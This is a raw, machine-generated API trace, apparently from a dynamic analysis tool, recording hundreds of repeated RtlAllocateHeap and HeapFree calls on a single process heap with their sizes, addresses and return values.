[0058.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.220] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.220] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.221] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.222] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.222] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.223] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 